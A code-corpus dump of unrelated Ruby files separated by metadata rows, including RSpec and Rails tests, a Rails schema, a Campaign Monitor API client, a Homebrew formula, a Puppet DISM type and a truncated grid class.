options.merge!('command' => 'createVirtualRouterElement',
'nspid' => args[0])
end
request(options)
end
end
end
end
end
| 25.269231 | 130 | 0.578387 |
7a82c106b1c8a10ab8f53eaa973e21ff67237675 | 512 | require('rspec')
require('hangman')
describe(Hangman) do
describe('#answer') do
it("gives a six letter answer") do
test_word = Hangman.new(answer: "horses")
expect(test_word.answer()).to(eq(["h", "o", "r", "s", "e", "s"]))
end
end
describe('#user_guess') do
it("checks to see if the letter is in the answer") do
test_word = Hangman.new(answer: "horses")
choice = "h"
expect(test_word.user_guess(choice)).to(eq(["h", "_", "_", "_", "_", "_"]))
end
end
end
| 24.380952 | 81 | 0.583984 |
d54e3d21f324b396c8c0abcb37b3eeb698b05a1d | 1,458 | require 'spec_helper'
describe "Uploads" do
if Settings.file_uploads_engine != :carrierwave
pending "paperclip not detected, skipped. To run use UPLOADS=carrierwave rspec"
else
before :each do
f = "#{File.dirname(__FILE__)}/../uploads/1024x768.gif"
if File.file?(f)
File.unlink(f)
end
end
it 'supports file kind' do
Settings.set('file', File.open("#{File.dirname(__FILE__)}/support/1024x768.gif"), kind: 'file')
# because we're not inside Rails
Settings.get(:file).file.root = '/'
expect(Settings.get(:file).file.file.file).to eq "#{File.dirname(__FILE__).gsub('/spec', '/')}uploads/1024x768.gif"
expect(File.exists?(Settings.root_file_path.join("uploads/1024x768.gif"))).to be_truthy
end
it 'supports image kind' do
Settings.set('file', File.open("#{File.dirname(__FILE__)}/support/1024x768.gif"), kind: 'image')
# because we're not inside Rails
Settings.get(:file).file.root = '/'
expect(Settings.get(:file).file.file.file).to eq "#{File.dirname(__FILE__).gsub('/spec', '/')}uploads/1024x768.gif"
expect(File.exists?(Settings.root_file_path.join("uploads/1024x768.gif"))).to be_truthy
end
it 'supports defaults' do
Settings.apply_defaults!(File.join(File.dirname(__FILE__), 'support/defaults_w_file.yml'))
expect(File.exists?(Settings.root_file_path.join("uploads/1024x768.gif"))).to be_truthy
end
end
end
| 34.714286 | 121 | 0.673525 |
4a74b122a360c8d8421e238cbe0e0593b6a6593f | 2,079 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# This file is the source Rails uses to define your schema when running `rails
# db:schema:load`. When creating a new database, `rails db:schema:load` tends to
# be faster and is potentially less error prone than running all of your
# migrations from scratch. Old migrations may fail to apply correctly if those
# migrations use external dependencies or application code.
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 2020_09_10_092756) do
# These are extensions that must be enabled in order to support this database
enable_extension "plpgsql"
create_table "interests", force: :cascade do |t|
t.string "name"
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
end
create_table "letters", force: :cascade do |t|
t.string "title"
t.string "message"
t.integer "user_id"
t.integer "penpal_id"
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
end
create_table "penpal_interests", force: :cascade do |t|
t.integer "interest_id"
t.integer "penpal_id"
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
end
create_table "penpals", force: :cascade do |t|
t.string "first_name"
t.string "last_name"
t.integer "age"
t.string "frequency"
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
end
create_table "users", force: :cascade do |t|
t.string "username"
t.string "fb_name"
t.integer "fb_id"
t.string "password_digest"
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
end
end
| 35.237288 | 86 | 0.720539 |
1c57c35cac0688f38994f8deecb1e019aafc2501 | 1,770 | require 'test_helper'
class UsersEditTest < ActionDispatch::IntegrationTest
def setup
@user = users(:michael)
end
test "unsuccessful edit" do
log_in_as(@user)
get edit_user_path(@user)
assert_template 'users/edit'
patch user_path(@user), params: { user: { name: "",
email: "foo@invalid",
password: "foo",
password_confirmation: "bar" } }
assert_template 'users/edit'
end
test "successful edit" do
log_in_as(@user)
get edit_user_path(@user)
assert_template 'users/edit'
name = "Foo Bar"
email = "[email protected]"
patch user_path(@user), params: { user: { name: name,
email: email,
password: "",
password_confirmation: "" } }
assert_not flash.empty?
assert_redirected_to @user
@user.reload
assert_equal name, @user.name
assert_equal email, @user.email
end
test "successful edit with friendly forwarding" do
get edit_user_path(@user)
log_in_as(@user)
assert_redirected_to edit_user_url(@user)
name = "Foo Bar"
email = "[email protected]"
patch user_path(@user), params: { user: { name: name,
email: email,
password: "",
password_confirmation: "" } }
assert_not flash.empty?
assert_redirected_to @user
@user.reload
assert_equal name, @user.name
assert_equal email, @user.email
end
end
| 31.607143 | 78 | 0.50113 |
1107b28f3fe9bc717cbd860a02988ab8c7cdd72c | 885 | #
# SmartRails
# Ruby on Rails Project
# (C) Alessio Saltarin 2021
# MIT License
#
class SessionsController < ApplicationController
#
# Called on Login GET
#
def new
logger.info('Sessions controller - new')
end
#
# Create new session: called on Login POST
#
def create
@errors = false
logger.info('Sessions controller - create new session for user ' + params[:username])
@user = User.find_by(username: params[:username])
if @user&.authenticate(params[:password])
session[:user_id] = @user.id
redirect_to '/home/home'
else
@errors = true
render :new
end
end
#
# Called on Logout GET
#
def logout
logger.info('Sessions controller - logout')
if logged_in?
logger.info('Logging out ' + current_user.username)
session[:user_id] = nil
end
redirect_to '/welcome/index'
end
end
| 19.23913 | 89 | 0.647458 |
793ffbbfad9605b4569bba960be32d0ba3ca8eca | 8,531 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe Projects::SnippetsController do
include Gitlab::Routing
let_it_be(:user) { create(:user) }
let_it_be(:other_user) { create(:user) }
let_it_be(:project) { create(:project_empty_repo, :public) }
before do
project.add_maintainer(user)
project.add_developer(other_user)
end
describe 'GET #index' do
let(:base_params) do
{
namespace_id: project.namespace,
project_id: project
}
end
subject { get :index, params: base_params }
it_behaves_like 'paginated collection' do
let(:collection) { project.snippets }
let(:params) { base_params }
before do
create(:project_snippet, :public, project: project, author: user)
end
end
it 'fetches snippet counts via the snippet count service' do
service = double(:count_service, execute: {})
expect(Snippets::CountService)
.to receive(:new).with(nil, project: project)
.and_return(service)
subject
end
it_behaves_like 'snippets sort order' do
let(:params) { base_params }
end
context 'when the project snippet is private' do
let_it_be(:project_snippet) { create(:project_snippet, :private, project: project, author: user) }
context 'when anonymous' do
it 'does not include the private snippet' do
subject
expect(assigns(:snippets)).not_to include(project_snippet)
expect(response).to have_gitlab_http_status(:ok)
end
end
context 'when signed in as the author' do
it 'renders the snippet' do
sign_in(user)
subject
expect(assigns(:snippets)).to include(project_snippet)
expect(response).to have_gitlab_http_status(:ok)
end
end
context 'when signed in as a project member' do
it 'renders the snippet' do
sign_in(other_user)
subject
expect(assigns(:snippets)).to include(project_snippet)
expect(response).to have_gitlab_http_status(:ok)
end
end
end
end
describe 'POST #mark_as_spam' do
let_it_be(:snippet) { create(:project_snippet, :private, project: project, author: user) }
before do
allow_next_instance_of(Spam::AkismetService) do |instance|
allow(instance).to receive_messages(submit_spam: true)
end
stub_application_setting(akismet_enabled: true)
end
def mark_as_spam
admin = create(:admin)
create(:user_agent_detail, subject: snippet)
project.add_maintainer(admin)
sign_in(admin)
post :mark_as_spam,
params: {
namespace_id: project.namespace,
project_id: project,
id: snippet.id
}
end
it 'updates the snippet' do
mark_as_spam
expect(snippet.reload).not_to be_submittable_as_spam
end
end
shared_examples 'successful response' do
it 'renders the snippet' do
subject
expect(assigns(:snippet)).to eq(project_snippet)
expect(response).to have_gitlab_http_status(:ok)
end
end
%w[show raw].each do |action|
describe "GET ##{action}" do
context 'when the project snippet is private' do
let_it_be(:project_snippet) { create(:project_snippet, :private, :repository, project: project, author: user) }
subject { get action, params: { namespace_id: project.namespace, project_id: project, id: project_snippet.to_param } }
context 'when anonymous' do
it 'responds with status 404' do
subject
expect(response).to have_gitlab_http_status(:not_found)
end
end
context 'when signed in as the author' do
before do
sign_in(user)
end
it_behaves_like 'successful response'
end
context 'when signed in as a project member' do
before do
sign_in(other_user)
end
it_behaves_like 'successful response'
end
end
context 'when the project snippet does not exist' do
subject { get action, params: { namespace_id: project.namespace, project_id: project, id: 42 } }
context 'when anonymous' do
it 'responds with status 404' do
subject
expect(response).to have_gitlab_http_status(:not_found)
end
end
context 'when signed in' do
before do
sign_in(user)
end
it 'responds with status 404' do
subject
expect(response).to have_gitlab_http_status(:not_found)
end
end
end
end
end
describe "GET #show for embeddable content" do
let(:project_snippet) { create(:project_snippet, :repository, snippet_permission, project: project, author: user) }
let(:extra_params) { {} }
before do
sign_in(user)
end
subject { get :show, params: { namespace_id: project.namespace, project_id: project, id: project_snippet.to_param, **extra_params }, format: :js }
context 'when snippet is private' do
let(:snippet_permission) { :private }
it 'responds with status 404' do
subject
expect(response).to have_gitlab_http_status(:not_found)
end
end
context 'when snippet is public' do
let(:snippet_permission) { :public }
it 'renders the blob from the repository' do
subject
expect(assigns(:snippet)).to eq(project_snippet)
expect(assigns(:blobs).map(&:name)).to eq(project_snippet.blobs.map(&:name))
expect(response).to have_gitlab_http_status(:ok)
end
it 'does not show the blobs expanded by default' do
subject
expect(assigns(:blobs).map(&:expanded?)).to be_all(false)
end
context 'when param expanded is set' do
let(:extra_params) { { expanded: true } }
it 'shows all blobs expanded' do
subject
expect(assigns(:blobs).map(&:expanded?)).to be_all(true)
end
end
end
context 'when the project is private' do
let(:project) { create(:project_empty_repo, :private) }
context 'when snippet is public' do
let(:project_snippet) { create(:project_snippet, :public, project: project, author: user) }
it 'responds with status 404' do
subject
expect(assigns(:snippet)).to eq(project_snippet)
expect(response).to have_gitlab_http_status(:not_found)
end
end
end
end
describe 'GET #raw' do
let(:inline) { nil }
let(:line_ending) { nil }
let(:params) do
{
namespace_id: project.namespace,
project_id: project,
id: project_snippet.to_param,
inline: inline,
line_ending: line_ending
}
end
subject { get :raw, params: params }
context 'when repository is empty' do
let_it_be(:content) { "first line\r\nsecond line\r\nthird line" }
let_it_be(:project_snippet) do
create(
:project_snippet, :public, :empty_repo,
project: project,
author: user,
content: content
)
end
let(:formatted_content) { content.gsub(/\r\n/, "\n") }
context 'CRLF line ending' do
before do
allow_next_instance_of(Blob) do |instance|
allow(instance).to receive(:data).and_return(content)
end
end
it 'returns LF line endings by default' do
subject
expect(response.body).to eq(formatted_content)
end
context 'when line_ending parameter present' do
let(:line_ending) { :raw }
it 'does not convert line endings' do
subject
expect(response.body).to eq(content)
end
end
end
end
context 'when repository is not empty' do
let_it_be(:project_snippet) do
create(
:project_snippet, :public, :repository,
project: project,
author: user
)
end
it 'sends the blob' do
subject
expect(response).to have_gitlab_http_status(:ok)
expect(response.header[Gitlab::Workhorse::SEND_DATA_HEADER]).to start_with('git-blob:')
expect(response.header[Gitlab::Workhorse::DETECT_HEADER]).to eq 'true'
end
it_behaves_like 'project cache control headers'
it_behaves_like 'content disposition headers'
end
end
end
| 26.493789 | 150 | 0.619974 |
28d7ab7ecabe91430de9bb0c218a225d9aa63ea1 | 4,555 | require 'minitest_helper'
describe Fog::Compute::XenServer::Models::StorageRepository do
let(:storage_repository_class) do
class Fog::Compute::XenServer::Models::StorageRepository
def self.read_identity
instance_variable_get('@identity')
end
end
Fog::Compute::XenServer::Models::StorageRepository
end
it 'should associate to a provider class' do
storage_repository_class.provider_class.must_equal('SR')
end
it 'should have a collection name' do
storage_repository_class.collection_name.must_equal(:storage_repositories)
end
it 'should have an unique id' do
storage_repository_class.read_identity.must_equal(:reference)
end
it 'should have 18 attributes' do
storage_repository_class.attributes.must_equal([ :reference,
:allowed_operations,
:blobs,
:content_type,
:current_operations,
:description,
:introduced_by,
:local_cache_enabled,
:name,
:other_config,
:physical_size,
:physical_utilisation,
:shared,
:sm_config,
:tags,
:type,
:uuid,
:virtual_allocation ])
end
it 'should have 2 associations' do
storage_repository_class.associations.must_equal(:pbds => :pbds,
:vdis => :vdis)
end
it 'should have 20 masks' do
storage_repository_class.masks.must_equal(:reference => :reference,
:allowed_operations => :allowed_operations,
:blobs => :blobs,
:content_type => :content_type,
:current_operations => :current_operations,
:description => :description,
:introduced_by => :introduced_by,
:local_cache_enabled => :local_cache_enabled,
:name => :name,
:other_config => :other_config,
:physical_size => :physical_size,
:physical_utilisation => :physical_utilisation,
:shared => :shared,
:sm_config => :sm_config,
:tags => :tags,
:type => :type,
:uuid => :uuid,
:virtual_allocation => :virtual_allocation,
:pbds => :PBDs,
:vdis => :VDIs)
end
it 'should have 4 aliases' do
storage_repository_class.aliases.must_equal(:name_label => :name,
:name_description => :description,
:PBDs => :pbds,
:VDIs => :vdis)
end
it 'should have 5 default values' do
storage_repository_class.default_values.must_equal(:content_type => 'user',
:shared => false,
:description => '',
:physical_size => '0',
:sm_config => {})
end
it 'should require 2 attributes before save' do
storage_repository_class.require_before_save.must_equal([ :name, :type ])
end
end | 49.51087 | 94 | 0.380022 |
bb30605d7103a6c6e96739bb0f94c22c57d59000 | 385 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::DataMigration::Mgmt::V2017_11_15_preview
module Models
#
# Defines values for ResourceSkuRestrictionsType
#
module ResourceSkuRestrictionsType
Location = "location"
end
end
end
| 24.0625 | 70 | 0.74026 |
386a7705104a4a797325a117229b957a1d783bb0 | 851 | # Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'spec_helper'
describe command('curl -L http://localhost/') do
its(:stdout) { should match /<h2>Welcome<\/h2>/ }
its(:stdout) { should match /<p>Matomo is libre software used to analyze traffic from your visitors.<\/p>/ }
its(:exit_status) { should eq 0 }
end
| 38.681818 | 110 | 0.73678 |
bfcd3ff1cf11a3ff61dbfea88cb6b865fd2153e9 | 2,782 | module Polaris
class FormBuilder < ActionView::Helpers::FormBuilder
include ActionView::Helpers::OutputSafetyHelper
attr_reader :template
delegate :render, :pluralize, to: :template
def errors_summary
return if object.blank?
return unless object.errors.any?
model_name = object.class.model_name.human.downcase
render Polaris::BannerComponent.new(
title: "There's #{pluralize(object.errors.count, "error")} with this #{model_name}:",
status: :critical
) do
render(Polaris::ListComponent.new) do |list|
object.errors.full_messages.each do |error|
list.item { error.html_safe }
end
end
end
end
def error_for(method)
return if object.blank?
return unless object.errors.key?(method)
raw object.errors.full_messages_for(method)&.first
end
def polaris_inline_error_for(method, **options, &block)
error_message = error_for(method)
return unless error_message
render(Polaris::InlineErrorComponent.new(**options, &block)) do
error_message
end
end
def polaris_text_field(method, **options, &block)
options[:error] ||= error_for(method)
if options[:error_hidden] && options[:error]
options[:error] = !!options[:error]
end
render Polaris::TextFieldComponent.new(form: self, attribute: method, **options, &block)
end
def polaris_select(method, **options, &block)
options[:error] ||= error_for(method)
if options[:error_hidden] && options[:error]
options[:error] = !!options[:error]
end
value = object&.public_send(method)
if value.present?
options[:selected] = value
end
render Polaris::SelectComponent.new(form: self, attribute: method, **options, &block)
end
def polaris_check_box(method, **options, &block)
options[:error] ||= error_for(method)
if options[:error_hidden] && options[:error]
options[:error] = !!options[:error]
end
render Polaris::CheckboxComponent.new(form: self, attribute: method, **options, &block)
end
def polaris_radio_button(method, **options, &block)
options[:error] ||= error_for(method)
if options[:error_hidden] && options[:error]
options[:error] = !!options[:error]
end
render Polaris::RadioButtonComponent.new(form: self, attribute: method, **options, &block)
end
def polaris_dropzone(method, **options, &block)
options[:error] ||= error_for(method)
if options[:error_hidden] && options[:error]
options[:error] = !!options[:error]
end
render Polaris::DropzoneComponent.new(form: self, attribute: method, **options, &block)
end
end
end
| 31.613636 | 96 | 0.649173 |
7922c0553d38d29ebefa1a856561ff732fd0366c | 464 | # # encoding: utf-8
# Inspec test for recipe sudo::panavaserver3
# The Inspec reference, with examples and extensive documentation, can be
# found at http://inspec.io/docs/reference/resources/
unless os.windows?
# This is an example test, replace with your own test.
describe user('root'), :skip do
it { should exist }
end
end
# This is an example test, replace it with your own test.
describe port(80), :skip do
it { should_not be_listening }
end
| 24.421053 | 73 | 0.724138 |
6a7d6f203b5a7951a5c6bd6a2bb3b05ccd513758 | 1,023 | require File.expand_path(File.dirname(__FILE__) + '/../test_helper')
class EmailAfterBeingDeliveredTest < ActiveSupport::TestCase
def setup
ActionMailer::Base.deliveries = []
@email = new_email(
:subject => 'Hello',
:body => 'How are you?',
:sender => create_email_address(:spec => 'webmaster@localhost'),
:to => create_email_address(:spec => 'partners@localhost'),
:cc => create_email_address(:spec => 'support@localhost'),
:bcc => create_email_address(:spec => 'feedback@localhost')
)
assert @email.deliver
end
def test_should_send_mail
assert ActionMailer::Base.deliveries.any?
delivery = ActionMailer::Base.deliveries.first
assert_equal 'Hello', delivery.subject
assert_equal 'How are you?', delivery.body
assert_equal ['webmaster@localhost'], delivery.from
assert_equal ['partners@localhost'], delivery.to
assert_equal ['support@localhost'], delivery.cc
assert_equal ['feedback@localhost'], delivery.bcc
end
end
| 34.1 | 70 | 0.68915 |
1cfd643480cab7aaf289805e85dc07aa9cbb542a | 9,981 | require 'cgi'
require 'uri'
require 'httparty'
require 'hashie'
require 'json'
module CreateSend
USER_AGENT_STRING = "createsend-ruby-#{VERSION}-#{RUBY_VERSION}-p#{RUBY_PATCHLEVEL}-#{RUBY_PLATFORM}"
# Represents a CreateSend API error. Contains specific data about the error.
class CreateSendError < StandardError
attr_reader :data
def initialize(data)
@data = data
# @data should contain Code, Message and optionally ResultData
extra = @data.ResultData ? "\nExtra result data: #{@data.ResultData}" : ""
super "The CreateSend API responded with the following error"\
" - #{@data.Code}: #{@data.Message}#{extra}"
end
end
# Raised for HTTP response codes of 400...500
class ClientError < StandardError; end
# Raised for HTTP response codes of 500...600
class ServerError < StandardError; end
# Raised for HTTP response code of 400
class BadRequest < CreateSendError; end
# Raised for HTTP response code of 401
class Unauthorized < CreateSendError; end
# Raised for HTTP response code of 404
class NotFound < ClientError; end
# Raised for HTTP response code of 401, specifically when an OAuth token
# in invalid (Code: 120, Message: 'Invalid OAuth Token')
class InvalidOAuthToken < Unauthorized; end
# Raised for HTTP response code of 401, specifically when an OAuth token
# has expired (Code: 121, Message: 'Expired OAuth Token')
class ExpiredOAuthToken < Unauthorized; end
# Raised for HTTP response code of 401, specifically when an OAuth token
# has been revoked (Code: 122, Message: 'Revoked OAuth Token')
class RevokedOAuthToken < Unauthorized; end
# Provides high level CreateSend functionality/data you'll probably need.
class CreateSend
include HTTParty
attr_reader :auth_details
# Specify cert authority file for cert validation
ssl_ca_file File.expand_path(File.join(File.dirname(__FILE__), 'cacert.pem'))
# Set a custom user agent string to be used when instances of
# CreateSend::CreateSend make API calls.
#
# user_agent - The user agent string to use in the User-Agent header when
# instances of this class make API calls. If set to nil, the
# default value of CreateSend::USER_AGENT_STRING will be used.
def self.user_agent(user_agent)
headers({'User-Agent' => user_agent || USER_AGENT_STRING})
end
# Get the authorization URL for your application, given the application's
# client_id, redirect_uri, scope, and optional state data.
def self.authorize_url(client_id, redirect_uri, scope, state=nil)
qs = "client_id=#{CGI.escape(client_id.to_s)}"
qs << "&redirect_uri=#{CGI.escape(redirect_uri.to_s)}"
qs << "&scope=#{CGI.escape(scope.to_s)}"
qs << "&state=#{CGI.escape(state.to_s)}" if state
"#{@@oauth_base_uri}?#{qs}"
end
# Exchange a provided OAuth code for an OAuth access token, 'expires in'
# value, and refresh token.
def self.exchange_token(client_id, client_secret, redirect_uri, code)
body = "grant_type=authorization_code"
body << "&client_id=#{CGI.escape(client_id.to_s)}"
body << "&client_secret=#{CGI.escape(client_secret.to_s)}"
body << "&redirect_uri=#{CGI.escape(redirect_uri.to_s)}"
body << "&code=#{CGI.escape(code.to_s)}"
options = {:body => body}
response = HTTParty.post(@@oauth_token_uri, options)
if response.has_key? 'error' and response.has_key? 'error_description'
err = "Error exchanging code for access token: "
err << "#{response['error']} - #{response['error_description']}"
raise err
end
r = Hashie::Mash.new(response)
[r.access_token, r.expires_in, r.refresh_token]
end
# Refresh an OAuth access token, given an OAuth refresh token.
# Returns a new access token, 'expires in' value, and refresh token.
def self.refresh_access_token(refresh_token)
options = {
:body => "grant_type=refresh_token&refresh_token=#{CGI.escape(refresh_token)}" }
response = HTTParty.post(@@oauth_token_uri, options)
if response.has_key? 'error' and response.has_key? 'error_description'
err = "Error refreshing access token: "
err << "#{response['error']} - #{response['error_description']}"
raise err
end
r = Hashie::Mash.new(response)
[r.access_token, r.expires_in, r.refresh_token]
end
def initialize(*args)
if args.size > 0
auth args.first # Expect auth details as first argument
end
end
@@base_uri = "https://api.createsend.com/api/v3.2"
@@oauth_base_uri = "https://api.createsend.com/oauth"
@@oauth_token_uri = "#{@@oauth_base_uri}/token"
headers({
'User-Agent' => USER_AGENT_STRING,
'Content-Type' => 'application/json; charset=utf-8'
})
base_uri @@base_uri
# Authenticate using either OAuth or an API key.
def auth(auth_details)
@auth_details = auth_details
end
# Refresh the current OAuth token using the current refresh token.
def refresh_token
if not @auth_details or
not @auth_details.has_key? :refresh_token or
not @auth_details[:refresh_token]
raise '@auth_details[:refresh_token] does not contain a refresh token.'
end
access_token, expires_in, refresh_token =
self.class.refresh_access_token @auth_details[:refresh_token]
auth({
:access_token => access_token,
:refresh_token => refresh_token})
[access_token, expires_in, refresh_token]
end
# Gets your clients.
def clients
response = get('/clients.json')
response.map{|item| Hashie::Mash.new(item)}
end
# Get your billing details.
def billing_details
response = get('/billingdetails.json')
Hashie::Mash.new(response)
end
# Gets valid countries.
def countries
response = get('/countries.json')
response.parsed_response
end
# Gets the current date in your account's timezone.
def systemdate
response = get('/systemdate.json')
Hashie::Mash.new(response)
end
# Gets valid timezones.
def timezones
response = get('/timezones.json')
response.parsed_response
end
# Gets the administrators for the account.
def administrators
response = get('/admins.json')
response.map{|item| Hashie::Mash.new(item)}
end
# Gets the primary contact for the account.
def get_primary_contact
response = get('/primarycontact.json')
Hashie::Mash.new(response)
end
# Set the primary contect for the account.
def set_primary_contact(email)
options = { :query => { :email => email } }
response = put("/primarycontact.json", options)
Hashie::Mash.new(response)
end
# Get a URL which initiates a new external session for the user with the
# given email.
# Full details: http://www.campaignmonitor.com/api/account/#single_sign_on
#
# email - The email address of the Campaign Monitor user for whom
# the login session should be created.
# chrome - Which 'chrome' to display - Must be either "all",
# "tabs", or "none".
# url - The URL to display once logged in. e.g. "/subscribers/"
# integrator_id - The integrator ID. You need to contact Campaign Monitor
# support to get an integrator ID.
# client_id - The Client ID of the client which should be active once
# logged in to the Campaign Monitor account.
#
# Returns An object containing a single field SessionUrl which represents
# the URL to initiate the external Campaign Monitor session.
def external_session_url(email, chrome, url, integrator_id, client_id)
options = { :body => {
:Email => email,
:Chrome => chrome,
:Url => url,
:IntegratorID => integrator_id,
:ClientID => client_id }.to_json }
response = put("/externalsession.json", options)
Hashie::Mash.new(response)
end
def get(*args)
args = add_auth_details_to_options(args)
handle_response CreateSend.get(*args)
end
alias_method :cs_get, :get
def post(*args)
args = add_auth_details_to_options(args)
handle_response CreateSend.post(*args)
end
alias_method :cs_post, :post
def put(*args)
args = add_auth_details_to_options(args)
handle_response CreateSend.put(*args)
end
alias_method :cs_put, :put
def delete(*args)
args = add_auth_details_to_options(args)
handle_response CreateSend.delete(*args)
end
alias_method :cs_delete, :delete
def add_auth_details_to_options(args)
if @auth_details
options = {}
if args.size > 1
options = args[1]
end
if @auth_details.has_key? :access_token
options[:headers] = {
"Authorization" => "Bearer #{@auth_details[:access_token]}" }
elsif @auth_details.has_key? :api_key
if not options.has_key? :basic_auth
options[:basic_auth] = {
:username => @auth_details[:api_key], :password => 'x' }
end
end
args[1] = options
end
args
end
def handle_response(response) # :nodoc:
case response.code
when 400
raise BadRequest.new(Hashie::Mash.new response)
when 401
data = Hashie::Mash.new(response)
case data.Code
when 120
raise InvalidOAuthToken.new data
when 121
raise ExpiredOAuthToken.new data
when 122
raise RevokedOAuthToken.new data
else
raise Unauthorized.new data
end
when 404
raise NotFound.new
when 400...500
raise ClientError.new
when 500...600
raise ServerError.new
else
response
end
end
end
end | 34.536332 | 103 | 0.65244 |
5d9e8ff45123e15f428808aef7b89b30e8c15824 | 2,005 | # -------------------------------------------------------------------------
# Copyright (c) 2020, WSO2 Inc. (http://www.wso2.org) All Rights Reserved.
# -------------------------------------------------------------------------
class Wso2amMicroGw320 < Formula
desc "WSO2 API Micro Gateway 3.2.0"
homepage "https://wso2.com/api-management/api-microgateway/"
url "https://dl.bintray.com/wso2/binary/wso2am-micro-gw-3.2.0.zip"
sha256 "2b1bdab62052c89c7673f92a0c722f0d507094c304aff9e9ee0a944e524f8d3e"
bottle :unneeded
def check_eula_acceptance()
notread = true
puts "\nIMPORTANT β READ CAREFULLY:"
puts "PLEASE REFER THE SOFTWARE LICENSE [https://wso2.com/license/wso2-update/LICENSE.txt] CAREFULLY BEFORE COMPLETING THE INSTALLATION PROCESS AND USING THE SOFTWARE."
while notread
print "DO YOU AGREE WITH WSO2 SOFTWARE LICENSE AGREEMENT ? [Y/n]: "
ans = STDIN.gets.chomp
if ( ans == 'y' || ans == 'Y' )
notread = false
puts "\nContinuing with the installation"
elsif ( ans == 'n' || ans == 'N' )
notread = false
puts "\nInstallation Aborted !"
exit(0)
else
puts "Please enter Y if you agrees with EULA. Otherwise enter N"
notread = true
end
end
end
def install
product = "wso2am-micro-gw"
version = "3.2.0"
check_eula_acceptance()
puts "Installing WSO2 API Micro Gateway #{version}..."
bin.install "bin/gateway" => "#{product}-#{version}"
libexec.install Dir["*"]
bin.env_script_all_files(libexec/"bin", Language::Java.java_home_env("1.8"))
puts "Installation is completed."
puts "\nIMPORTANT: After WSO2 Micro Gateway #{version} is successfully installed, Instigate any improvements on top of a released WSO2 product by running In-Place Updates tool."
puts "\nRun"
puts "\n #{product}-#{version} <Path_to_Executable_Artifact>"
puts "\nto start WSO2 Micro Gateway #{version}."
puts "\ncheers!!"
end
end
| 37.830189 | 181 | 0.616958 |
1d0a91ca7027f3b5489c39422d4e9157438b42a1 | 1,576 | Puppet::Type.newtype(:dism) do
@doc = 'Manages Windows features via dism.'
ensurable
newparam(:name, :namevar => true) do
desc 'The Windows feature name (case-sensitive).'
end
newparam(:answer) do
desc 'The answer file for installing the feature.'
end
newparam(:source) do
desc "The source files needed for installing the feature."
end
newparam(:limitaccess) do
desc "Prevent DISM from contacting Windows Update for repair of online images"
newvalues(:true, :false)
defaultto(false)
munge do |value|
resource.munge_boolean(value)
end
end
newparam(:all) do
desc 'A flag indicating if we should install all dependencies or not.'
newvalues(:true, :false)
defaultto(false)
munge do |value|
resource.munge_boolean(value)
end
end
newparam(:norestart) do
desc 'Whether to disable restart if the feature specifies it should be restarted'
newvalues(:true, :false)
defaultto(true)
munge do |value|
resource.munge_boolean(value)
end
end
newparam(:exitcode, :array_matching => :all) do
desc 'DISM installation process exit code'
# Ruby truncates exit codes to one bytes (https://bugs.ruby-lang.org/issues/8083)
# so use truncated codes as workaround.
#defaultto([0, 3010])
defaultto([0, 3010, 3010 & 0xFF])
end
def munge_boolean(value)
case value
when true, "true", :true
:true
when false, "false", :false
:false
else
fail("munge_boolean only takes booleans")
end
end
end
| 23.522388 | 85 | 0.663706 |
e96f336f846a795b108552b5f631dfa324c866ac | 178 | module EcwidApi
class ProductType < Entity
self.url_root = "classes"
ecwid_reader :id, :attributes, :name, :googleTaxonomy
ecwid_writer :attributes, :name
end
end | 19.777778 | 57 | 0.724719 |
219b6b8a22cba56faf423e3ebcd01f3dd65eb745 | 1,793 | # encoding: UTF-8
# This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 20160206143113) do
# These are extensions that must be enabled in order to support this database
enable_extension "plpgsql"
create_table "classrooms", force: true do |t|
t.integer "student_id"
t.integer "course_id"
t.datetime "created_at"
t.datetime "updated_at"
end
add_index "classrooms", ["course_id"], name: "index_classrooms_on_course_id", using: :btree
add_index "classrooms", ["student_id"], name: "index_classrooms_on_student_id", using: :btree
create_table "courses", force: true do |t|
t.string "name"
t.text "description"
t.integer "status"
t.datetime "created_at"
t.datetime "updated_at"
end
create_table "students", force: true do |t|
t.string "name"
t.string "register_number"
t.integer "status"
t.datetime "created_at"
t.datetime "updated_at"
end
add_foreign_key "classrooms", "courses", name: "classrooms_course_id_fk"
add_foreign_key "classrooms", "students", name: "classrooms_student_id_fk"
end
| 36.591837 | 95 | 0.740658 |
3803558128a003a7c09163614cb94385995c45a3 | 5,708 | #
# rm-macl/lib/rm-macl/xpan/grid/grid3.rb
# by IceDragon
require 'rm-macl/macl-core'
module MACL
class Grid3
CELL_ORDER_COLS = 1
CELL_ORDER_ROWS = 2
CELL_ORDER_LAYS = 3
@default_cell_order = CELL_ORDER_LAYS
attr_accessor :columns, :rows, :layers
attr_accessor :cell_width, :cell_height, :cell_depth
attr_reader :cell_order
##
# ::valid_cell_order?(CELL_ORDER order)
def self.valid_cell_order?(order)
order == CELL_ORDER_COLS ||
order == CELL_ORDER_ROWS ||
order == CELL_ORDER_LAYS
end
##
# ::validate_cell_order(CELL_ORDER order)
def self.validate_cell_order(order)
unless valid_cell_order?(order)
raise(ArgumentError, "Invalid Cell Order #{order}")
end
end
##
